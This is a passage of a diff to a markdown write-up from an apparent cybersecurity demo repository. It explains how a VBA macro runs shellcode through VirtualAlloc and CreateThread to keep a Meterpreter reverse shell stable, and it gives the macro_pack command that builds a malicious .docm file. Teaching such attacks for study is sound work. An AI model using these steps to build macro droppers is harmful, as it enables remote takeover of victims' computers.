EnricoPiccin02/Cybersecurity-Demo/home.md

     Document_Open
 End Sub
 ```
+By allocating executable memory for the shellcode with `myAlloc = VirtualAlloc(0, UBound(myBytes), &H1000, &H40)` and running it in a separate thread with `result = CreateThread(0, 0, myAlloc, 0, 0, myThread)`, **parallel execution** is achieved.
+This enhances the stability of the TCP connection, preventing Microsoft Word from becoming unresponsive and crashing, which would otherwise result in the error message `Meterpreter session is not valid and will be closed`.<br/>
 To embed this payload into a Word document, I used `macro_pack` by executing the following command:
 ```
 macro_pack.exe -f reverse_shell_exploit.vba -o -G malicious.docm